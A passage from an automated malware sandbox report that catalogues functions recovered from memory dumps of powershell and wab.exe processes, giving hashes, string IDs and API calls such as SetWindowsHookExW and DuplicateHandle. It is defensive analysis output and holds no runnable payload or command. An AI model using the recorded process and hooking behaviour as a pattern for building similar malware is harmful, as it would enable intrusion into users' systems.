                                            • Opcode Fuzzy Hash: c2ae186595a703d1971ea51a114453f6b0913f19bf657ff1488d255feb87fbab
                                            • Instruction Fuzzy Hash: 96517B71E002489FDB14DFA5D858BEDBBB2FF85304F148929D006ABB90DB74AC45CB50
                                            Function 02D69219 Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ced501e7502c08d927c2431084875c64c29e0d1c1d2302e4e8ba83f71e7e5b1
                                            • Instruction ID: 8f14f8666db7267b72ea075193636453bfafdd27bd1cf31cb05f4eae09591755
                                            • Opcode Fuzzy Hash: 7ced501e7502c08d927c2431084875c64c29e0d1c1d2302e4e8ba83f71e7e5b1
                                            • Instruction Fuzzy Hash: 2F418D31A402409FDB14DFB4D968BAD7BB2FF89754F194969E406EBBA0CB34AC41CB50
                                            Function 02D62C5F Relevance: .1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dfbea2dccc0273f5db372dc49b69cb835902f2a14d6a14268d2dd73b5ca3dd98
                                            • Instruction ID: e8e7613165a4edf42a5767e6910722a7aa23774250567d2636a1ec665dc317e3
                                            • Opcode Fuzzy Hash: dfbea2dccc0273f5db372dc49b69cb835902f2a14d6a14268d2dd73b5ca3dd98
                                            • Instruction Fuzzy Hash: 71410574A006059FCB19CF99C598EBAFBB1FF48314B15815AD815AB364C736EC91CFA0
                                            Function 02D62C58 Relevance: .1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77dd07e9e871d7104686b0d34b58dc71a74446d733d6ba340778b0f2c6960a7e
                                            • Instruction ID: eeedcb8f14adbd0df4052b3cc8f8245905a42dae1c5342838e584bad7753916c
                                            • Opcode Fuzzy Hash: 77dd07e9e871d7104686b0d34b58dc71a74446d733d6ba340778b0f2c6960a7e
                                            • Instruction Fuzzy Hash: 8C410474A006059FCB19CF99C498EBAFBB1FF48314B15815AD815AB364C736EC91CFA0
                                            Function 073C74B6 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27809acef48110ff6bc4531f4e981cd051a396084fe130ad1e4d3ed34cd8ff0e
                                            • Instruction ID: 451a690fc3fb738500809b1f8d9435c046b5b98a8929448dd46fe69281f99aa6
                                            • Opcode Fuzzy Hash: 27809acef48110ff6bc4531f4e981cd051a396084fe130ad1e4d3ed34cd8ff0e
                                            • Instruction Fuzzy Hash: 213192B0B40214AFE7149B64C864BAF7AA3AB85744F60C428EE017F7D1CF76DC468B95
                                            Function 02D631C8 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c5cfc4e7c18f791609d784ca4c043f03c43aaccd42f60a52d40634b726d236f
                                            • Instruction ID: f0df6d8d66f01650d68aeb3e680f3913e50a39825ab2325e79e95101f1436311
                                            • Opcode Fuzzy Hash: 3c5cfc4e7c18f791609d784ca4c043f03c43aaccd42f60a52d40634b726d236f
                                            • Instruction Fuzzy Hash: FB214F74A042599FCB00CF98C480AAEBBF5FF8D310B148196E955EB352C735ED41CBA1
                                            Function 02D631B9 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 108dce9daf92d5e0546b03d45875910f71dd2a71c6c62943a2bb2af77664d2ff
                                            • Instruction ID: 15560388d735284da236214e6830861a85a671af2e364ed51c88921190bd0533
                                            • Opcode Fuzzy Hash: 108dce9daf92d5e0546b03d45875910f71dd2a71c6c62943a2bb2af77664d2ff
                                            • Instruction Fuzzy Hash: F6211D74A042499FCB00DF98D4809AABBF5FF49310B1485A9E919EB352D735ED41CBA1
                                            Function 02AFD01D Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664127570.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2afd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcb9809eed23e1319c0ced962aa570b45daf2d1f7f8fe23fb0d4948ac3bd94b4
                                            • Instruction ID: 8f6b065a1bc94adba9d9b7d9ba48d3c6760b57b453475f274477f752474c8b1d
                                            • Opcode Fuzzy Hash: bcb9809eed23e1319c0ced962aa570b45daf2d1f7f8fe23fb0d4948ac3bd94b4
                                            • Instruction Fuzzy Hash: C701F7314047049AE7614B61CCC4B67BF98DF41225F08C52AFE4A0BA82CB7C9845CAB1
                                            Function 02AFD01C Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664127570.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2afd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bb5d0d0af0aa5411c3dbf515e3e5d8a0d2198bcef6afb53c1dd9bdbe2a343bc1
                                            • Instruction ID: 5c53a679c8e74dbe8f28de70f32da91515a187f68a6cc1974ecd84231d4c9c67
                                            • Opcode Fuzzy Hash: bb5d0d0af0aa5411c3dbf515e3e5d8a0d2198bcef6afb53c1dd9bdbe2a343bc1
                                            • Instruction Fuzzy Hash: ACF0CD72005744AEEB618B16C9C8B63FFD8EB41234F18C55AEE481B686C779A844CAB1
                                            Function 02D6FEBF Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4eb3c6cc2f12bd78de08edbd0f1671b9379d51bd5d205436c66401e1cf962f1
                                            • Instruction ID: 00a4de047f32cb6941c9d6b0b5596cd6742c3279d5545196af67b47f814a53a2
                                            • Opcode Fuzzy Hash: e4eb3c6cc2f12bd78de08edbd0f1671b9379d51bd5d205436c66401e1cf962f1
                                            • Instruction Fuzzy Hash: 76014435E00505DFCB14CF88D8809ADF7B2FF88324B248258D819A7A51C736EC52CB94
                                            Function 073C068F Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1557d69bbc8041ae7853bf60d554d1dc2304620e25d1e5cb3039e4cc06fcf44
                                            • Instruction ID: a2b8d90fb9842b5b06d5626510429cfffa06117b2089b0455e55abbffbfede16
                                            • Opcode Fuzzy Hash: d1557d69bbc8041ae7853bf60d554d1dc2304620e25d1e5cb3039e4cc06fcf44
                                            • Instruction Fuzzy Hash: 53F081B3A091C18FE70ADAA44850A91FF60EF83124718808FC4494F293D7118426CB51
                                            Function 02D6FBD4 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db657929f906cfa4e821b717b337f2e6a83140d1617abf5c3324cdb9e3af79af
                                            • Instruction ID: c8092c0d7eaa586b2e22f38c1ed85d41d1a6a3cf201342a8ea273f01360b89cf
                                            • Opcode Fuzzy Hash: db657929f906cfa4e821b717b337f2e6a83140d1617abf5c3324cdb9e3af79af
                                            • Instruction Fuzzy Hash: 14F05435E001189FCB50CBCCE8509EDF7B6FF8C224B248159E419E3250C736AC52CB50
                                            Function 02D6FC28 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664678878.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2d60000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac0868b0655795052364ba070161caecfa390fd64ad8d6815749e6188d52b271
                                            • Instruction ID: 4df42a5bb503c949cb6e413f5fbbc26ffe36b3d21eab74b0c75749957d5dd0f0
                                            • Opcode Fuzzy Hash: ac0868b0655795052364ba070161caecfa390fd64ad8d6815749e6188d52b271
                                            • Instruction Fuzzy Hash: 0FE01A35B012158FDB00CB58E8905EDB3B1EB88224B2482A9D429DB2A2C7369D0BCB90
                                            Function 073C30E1 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98e4860e7ddd39e89f996e14dbb6a7c9343f9524105d81d79bbf8f3d9243513e
                                            • Instruction ID: 7462003a11f4615f710252deea738263fd8a844f2599d5bbeeeb35d5b4136cc0
                                            • Opcode Fuzzy Hash: 98e4860e7ddd39e89f996e14dbb6a7c9343f9524105d81d79bbf8f3d9243513e
                                            • Instruction Fuzzy Hash: CBE092F62041429FEB28D6B5C855461BB72BF8A20071CC49DD08E4F157EA21DC42CB03

                                            Non-executed Functions

                                            Function 02AFD6F8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1664127570.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2afd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06bb7168c81d7b546e7d3f66c927ef9c936cba57203cd11d17782159aed0feda
                                            • Instruction ID: 82cdb94da6b443fe0a250754de96df7738f4d960da43b8e085a29fee57d80459
                                            • Opcode Fuzzy Hash: 06bb7168c81d7b546e7d3f66c927ef9c936cba57203cd11d17782159aed0feda
                                            • Instruction Fuzzy Hash: 5C216772504604DFDB56DF50D9C0B16BF65FB88324F20856DFA090F246C73AD446CBA2
                                            Function 073C9B15 Relevance: 14.0, Strings: 11, Instructions: 286COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$tPq$tPq$tPq$tPq$$q$(q$(q$(q$(q
                                            • API String ID: 0-1570892024
                                            • Opcode ID: 7a33253acdb891dcd9987ddbccf4ccd7d581fe4ad6e37c38c6b9910a1590f2b5
                                            • Instruction ID: 70ed31783c5976acb451b716ede9f2d384f41810da484ba7d6f7854723575bf5
                                            • Opcode Fuzzy Hash: 7a33253acdb891dcd9987ddbccf4ccd7d581fe4ad6e37c38c6b9910a1590f2b5
                                            • Instruction Fuzzy Hash: 9AA1E9B1B102159FEB24DB64C80576ABBE6BF89311F16845DEC49AF390DB31EC41CBA1
                                            Function 073C1920 Relevance: 12.8, Strings: 10, Instructions: 306COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                            • API String ID: 0-3456696661
                                            • Opcode ID: 78492fd1c1ae267fe9f2d6e8fcfbe3aa9ef6f777df89fdd9052248a5008d65b8
                                            • Instruction ID: baac440f6674be8081b1476eba7f7ded9bcf97ef83d5ff756000ed90e7ef3cee
                                            • Opcode Fuzzy Hash: 78492fd1c1ae267fe9f2d6e8fcfbe3aa9ef6f777df89fdd9052248a5008d65b8
                                            • Instruction Fuzzy Hash: CDA127F1B0021D9FEB24DB65D4017AABBA6BF85310F18C06EE8499B742DB31DC42DB91
                                            Function 073CB288 Relevance: 7.8, Strings: 6, Instructions: 338COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-1794337482
                                            • Opcode ID: a15af153ce04d88dab9c6e30b841d7e20a81827c05d94d38ea1842ba1d7b204b
                                            • Instruction ID: 082a9479f7b9ea3a6613ea3b0a18393f6d939d1d4c09d2e6615f7b8ab9968bb1
                                            • Opcode Fuzzy Hash: a15af153ce04d88dab9c6e30b841d7e20a81827c05d94d38ea1842ba1d7b204b
                                            • Instruction Fuzzy Hash: 55E15DB4A103199FEB25DB24C951BDEBBB2BB45300F5085D9D908AB745CB31AE82CF91
                                            Function 073C8970 Relevance: 7.7, Strings: 6, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q$$q
                                            • API String ID: 0-1538229613
                                            • Opcode ID: ac563c4ce2af41ded820dcc44d0d3a5094c977d18f7476c9f64b735ebdb3fd3b
                                            • Instruction ID: 28046aa5e05ca152a0fbec92a834d41b55412e75eba89383ad3be18ee0c612e6
                                            • Opcode Fuzzy Hash: ac563c4ce2af41ded820dcc44d0d3a5094c977d18f7476c9f64b735ebdb3fd3b
                                            • Instruction Fuzzy Hash: 676159F570420ADFEB25CA69D4002EABBA2AF85311F18C0BED80DCB241CB31DE41CB91
                                            Function 073CA595 Relevance: 7.7, Strings: 6, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XRq$XRq$XRq$tPq$tPq$$q
                                            • API String ID: 0-422185277
                                            • Opcode ID: 6901934acd168572a1ea12510a120926b4819ef1e14c072177ef08404ba32f17
                                            • Instruction ID: c86b637ce434e3cd1f2218d98e8719192e807f5a5faf8d23e43413a31b647492
                                            • Opcode Fuzzy Hash: 6901934acd168572a1ea12510a120926b4819ef1e14c072177ef08404ba32f17
                                            • Instruction Fuzzy Hash: B56108B5B002099FE725DB68C40176ABBF2BF89315F24C46DE94A9F651CB31DC41CBA1
                                            Function 073C2405 Relevance: 7.6, Strings: 6, Instructions: 55COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q$$q
                                            • API String ID: 0-1538229613
                                            • Opcode ID: 179dbef2040890c1f64c5b81fe429081bc4e88d1c50df09d8237d885be74e9d2
                                            • Instruction ID: 2d7a22a6ad56795ab7561a667b87298fa5f556d554e9e7e4059112104861f9d9
                                            • Opcode Fuzzy Hash: 179dbef2040890c1f64c5b81fe429081bc4e88d1c50df09d8237d885be74e9d2
                                            • Instruction Fuzzy Hash: 4B1129B0B0422ACFFB34CF56A444A2777A5BF8565076940BEEC4D9F611CB309C02C381
                                            Function 073C2CB0 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q
                                            • API String ID: 0-170447905
                                            • Opcode ID: 0c48a91c6e7eb8924665e963c0d210fb114b25f342b85d5f1c247eaed6b83865
                                            • Instruction ID: 345bba51837147338ad96bd4cd9badf80cff0fb0eac4a279dc8085ad86193818
                                            • Opcode Fuzzy Hash: 0c48a91c6e7eb8924665e963c0d210fb114b25f342b85d5f1c247eaed6b83865
                                            • Instruction Fuzzy Hash: 5A4148F7700206DFFB29CA29D4042A7B7A5BF91221B28847FEC5A9B655DB31CC82C751
                                            Function 073C3F1C Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q
                                            • API String ID: 0-170447905
                                            • Opcode ID: 9b3072efc9a85c6a09847a95d615e02743218da36de12b5b37399eebae847b31
                                            • Instruction ID: 82264479f16ed984f146053ed6d024479c9170059a164ec3c50fff22b8fcc28e
                                            • Opcode Fuzzy Hash: 9b3072efc9a85c6a09847a95d615e02743218da36de12b5b37399eebae847b31
                                            • Instruction Fuzzy Hash: 574146B67053568FFF25CA25A810266BBB9EFC2111B28C97ED91A87241DA35CC12C753
                                            Function 073C191F Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: ba3ce176a9dc6dc55d3136b7e83f9e2e020ec493768003d42fd43d7e6aab0bb7
                                            • Instruction ID: 55634b5366c1052aca419f530250f8241b0c72ef850f5c890be2d89fdeef47ac
                                            • Opcode Fuzzy Hash: ba3ce176a9dc6dc55d3136b7e83f9e2e020ec493768003d42fd43d7e6aab0bb7
                                            • Instruction Fuzzy Hash: AC31C1F5A1020ADBFB24CE45C541B66B7B6AF45320F1CC0AEE81D5B692CB71DC80DB91
                                            Function 073CACF0 Relevance: 5.4, Strings: 4, Instructions: 374COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q
                                            • API String ID: 0-4210068417
                                            • Opcode ID: afb41723bf86487afbc86b6da33a81ba4378b3e2ab70ad3b48791f08067b486a
                                            • Instruction ID: f24568ba7f8189a8628831aad1e9c022e49698a5b1b053a8b42bebf21510908f
                                            • Opcode Fuzzy Hash: afb41723bf86487afbc86b6da33a81ba4378b3e2ab70ad3b48791f08067b486a
                                            • Instruction Fuzzy Hash: 35E15FB4A113099FEB24DFA4C851B6EBBB7AF88704F14C51DD9056BB84CB31EC468B91
                                            Function 073CEA38 Relevance: 5.3, Strings: 4, Instructions: 297COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPq$tPq$tPq$tPq
                                            • API String ID: 0-3476066832
                                            • Opcode ID: 71a488d861cd004b0feebf83d5473c31ee8af68ec65ed8584beffe61d21d121f
                                            • Instruction ID: baf6834e37622943f586f3fd8b4574bf0486a3dfbbbe5580ced3bf38ab5b2ea4
                                            • Opcode Fuzzy Hash: 71a488d861cd004b0feebf83d5473c31ee8af68ec65ed8584beffe61d21d121f
                                            • Instruction Fuzzy Hash: 92A1F7B1B402159FEB24DF59C405B6ABBA2BFC9311F18C46DE94A9B790CB31DC42CB91
                                            Function 073C0CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$$q
                                            • API String ID: 0-4102054182
                                            • Opcode ID: 793a19b20292b543cd2f3731eb0e158c7c6859638fe7f39ebaf7e2b1e596949c
                                            • Instruction ID: 50d62b9fd680f7917774bac786d530b079f878b1114eae1ed420288c0bc9fa12
                                            • Opcode Fuzzy Hash: 793a19b20292b543cd2f3731eb0e158c7c6859638fe7f39ebaf7e2b1e596949c
                                            • Instruction Fuzzy Hash: C22137B63003469BFB3C9529AC04727769AABC0611F24842EA949CB289DD31EC418361
                                            Function 073C7EF0 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$$q
                                            • API String ID: 0-4102054182
                                            • Opcode ID: 73777ed9988ae7383b46b5c229f3566720d92f8b71b0a4b6a1a9a9faff2b008f
                                            • Instruction ID: e08f3050c372857cf7e4059e4a02b1488792147ba66c62d2c05c4fd9dfd613bb
                                            • Opcode Fuzzy Hash: 73777ed9988ae7383b46b5c229f3566720d92f8b71b0a4b6a1a9a9faff2b008f
                                            • Instruction Fuzzy Hash: DD119DF1A02217EBFB20DE69D5816A6BBF9EF81250F18406EDC0C87201DB31DD45CBA2
                                            Function 073C17BF Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.1674557319.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_73c0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q
                                            • API String ID: 0-3199993180
                                            • Opcode ID: be9d4c8f8fe971516a1f8d4c82782789bfbfb38892b6f0cd06d85143592505fb
                                            • Instruction ID: c2d63c431e9d88b16058ed10f5647113f99cb4ee91c226c46312ba51d0fb3418
                                            • Opcode Fuzzy Hash: be9d4c8f8fe971516a1f8d4c82782789bfbfb38892b6f0cd06d85143592505fb
                                            • Instruction Fuzzy Hash: D1F05CF1F0431F47E63C909938216778967AFC4551739812FE90A9BB81CEA18C4243D7

                                            Execution Graph

                                            Execution Coverage:7.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:14
                                            Total number of Limit Nodes:2
                                            execution_graph 13839 2fd7128 13840 2fd716e GetCurrentProcess 13839->13840 13842 2fd71c0 GetCurrentThread 13840->13842 13844 2fd71b9 13840->13844 13843 2fd71fd GetCurrentProcess 13842->13843 13845 2fd71f6 13842->13845 13848 2fd7233 13843->13848 13844->13842 13845->13843 13846 2fd725b GetCurrentThreadId 13847 2fd728c 13846->13847 13848->13846 13833 2fd7370 DuplicateHandle 13834 2fd7406 13833->13834 13835 2fd2270 13838 2fd22b4 SetWindowsHookExW 13835->13838 13837 2fd22fa 13838->13837

                                            Executed Functions

                                            Function 02FD711B Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 02FD71A6
                                            • GetCurrentThread.KERNEL32 ref: 02FD71E3
                                            • GetCurrentProcess.KERNEL32 ref: 02FD7220
                                            • GetCurrentThreadId.KERNEL32 ref: 02FD7279
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2529850348.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fd0000_wab.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 395df78cefd0a86dfa7d24cb63396e30de68ad147ed56097f0c44924f5f35d23
                                            • Instruction ID: dd57ab9518b46f0a65d77313a1d909dd1b18a54ebb718a1ab2ff8437042b374b
                                            • Opcode Fuzzy Hash: 395df78cefd0a86dfa7d24cb63396e30de68ad147ed56097f0c44924f5f35d23
                                            • Instruction Fuzzy Hash: 255187B0D007498FEB14EFA9C98879EBBF1AF49304F24849AE019AB3A0D7345945CF61
                                            Function 02FD7128 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 02FD71A6
                                            • GetCurrentThread.KERNEL32 ref: 02FD71E3
                                            • GetCurrentProcess.KERNEL32 ref: 02FD7220
                                            • GetCurrentThreadId.KERNEL32 ref: 02FD7279
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2529850348.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fd0000_wab.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 44113af8e8f938e94a0129f72406c8fe4cf9912d1237ac53cc94d6066f44363b
                                            • Instruction ID: 90db498ff880095cdb5237dfc26e0cc54d7c60a647582f221151fd3f5eb33095
                                            • Opcode Fuzzy Hash: 44113af8e8f938e94a0129f72406c8fe4cf9912d1237ac53cc94d6066f44363b
